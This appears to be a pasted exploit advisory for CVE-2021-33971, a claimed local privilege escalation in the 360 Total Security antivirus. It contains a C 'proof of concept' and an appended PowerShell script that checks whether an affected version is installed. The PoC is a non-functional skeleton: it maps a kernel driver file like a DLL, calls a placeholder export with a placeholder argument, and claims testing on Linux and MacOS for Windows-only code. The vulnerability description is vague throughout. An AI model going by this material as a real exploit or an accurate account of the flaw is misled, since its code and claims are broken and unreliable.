memorycorruptor

CVE-2021-33971

Feb 2nd, 2023 (edited)
# Exploit Title: 360 Total Security 10.8.0.1060 Local Privilege Escalation
# Google Dork: N/A
# Date: 2021-05-11
# Exploit Author: youtube.com/@memorycorruptor
# Vendor Homepage: http://www.360totalsecurity.com/
# Version: 360 Total Security 10.8.0.1060
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2021-33971
# PoC Video: https://www.youtube.com/@memorycorruptor/videos
# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
---------------------------------------------------------------------------
Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1060

A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1060 allows code running as a standard user to perform actions with SYSTEM-level privileges through the antivirus software. The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.

Introduction
360 Total Security 10.8.0.1060 is an antivirus product that provides protection against a range of threats. A recently discovered LPE/EOP vulnerability in the software lets a standard user have actions carried out with SYSTEM-level privileges. This article analyzes the vulnerability and provides a PoC skeleton to demonstrate the exploit.

Vulnerability
The LPE/EOP vulnerability in 360 Total Security 10.8.0.1060 is similar to a Windows kernel vulnerability discovered in 2021. It allows a standard user to perform actions with SYSTEM-level privileges through the antivirus software, bypassing the usual access checks in Windows. Because this is a local privilege escalation, the attacker must already be able to run code on the machine as a standard user; the impact is elevation of that foothold to SYSTEM, which can lead to unauthorized access, data theft, or other malicious actions on the host.

Proof of Concept

#include <Windows.h>
#include <stdio.h>

int main(void) {
    /* Map the driver image into this process. LoadLibraryA maps the PE file
       like an ordinary DLL; it does not load the driver into the kernel. */
    HMODULE hDriver = LoadLibraryA("360TotalSecurity.sys");
    if (!hDriver) {
        printf("Failed to load driver: %lu\n", GetLastError());
        return 1;
    }

    /* Resolve the target routine by export name.
       "VulnerableFunction" is a placeholder for the real export name. */
    FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    if (!pVulnFunc) {
        printf("Failed to get function address: %lu\n", GetLastError());
        FreeLibrary(hDriver);
        return 1;
    }

    /* Exploit code: call the routine with the crafted argument (placeholder). */
    pVulnFunc(/* Crafted argument */);

    FreeLibrary(hDriver);
    return 0;
}

The PoC loads the vulnerable driver image (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability. Two caveats for anyone reproducing this: the skeleton is Windows-only (it relies on Windows.h and the Win32 loader APIs), and LoadLibrary only maps the driver's PE image into the calling process as if it were a DLL; it neither loads the driver into the kernel nor opens a handle to the running driver, so the skeleton has to be adapted to however the vulnerable code path is actually reached.
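As an added triage check, not part of the original advisory: before spending time on reproduction, confirm that a host actually carries the version named above and the driver file referenced by the PoC. The PowerShell below reads the standard Uninstall registry keys and the Win32_SystemDriver class. It assumes the product registers with a DisplayName containing "360 Total Security" (an assumption; adjust the filter if it does not), takes the driver file name 360TotalSecurity.sys from the PoC, and flags only the version the advisory lists as affected, since the advisory does not state a fixed version.

```powershell
# Added triage check (not from the original advisory).
# Assumptions: DisplayName contains "360 Total Security"; driver file name is
# taken from the PoC; only 10.8.0.1060 is flagged because no fixed version is given.

$AffectedVersion = [version]'10.8.0.1060'      # version listed in the advisory
$DriverName      = '360TotalSecurity.sys'      # file name used by the PoC

$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

function Get-360TotalSecurityInstall {
    # Returns every Uninstall entry whose DisplayName matches (assumed name).
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*360 Total Security*' } |
        Select-Object DisplayName, DisplayVersion, InstallLocation
}

function Test-AffectedVersion {
    # Classifies a DisplayVersion string against the advisory's affected version.
    param([string]$DisplayVersion)
    $parsed = $null
    if (-not [version]::TryParse($DisplayVersion, [ref]$parsed)) { return 'unparseable' }
    if ($parsed -eq $AffectedVersion) { return 'affected (matches advisory)' }
    return 'unknown (compare against vendor advisory)'
}

$installs = @(Get-360TotalSecurityInstall)
if ($installs.Count -eq 0) {
    Write-Output '360 Total Security: not found under the Uninstall registry keys'
} else {
    foreach ($i in $installs) {
        $state = Test-AffectedVersion -DisplayVersion $i.DisplayVersion
        Write-Output ('{0} {1}: {2}' -f $i.DisplayName, $i.DisplayVersion, $state)
    }
}

# Is a kernel driver with the PoC's file name registered, and is it running?
$drivers = Get-CimInstance -ClassName Win32_SystemDriver -ErrorAction SilentlyContinue |
    Where-Object { $_.PathName -like "*$DriverName*" }
if ($drivers) {
    $drivers | Select-Object Name, State, StartMode, PathName | Format-Table -AutoSize
} else {
    Write-Output "$DriverName: no registered kernel driver with that file name"
}
```

Run it from an elevated prompt so the HKLM hives and the driver inventory are fully readable. A host reporting both "affected (matches advisory)" and a running driver is the configuration the advisory describes; any other version is left as "unknown" on purpose rather than guessed at.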
---------------------------------------------------------------------------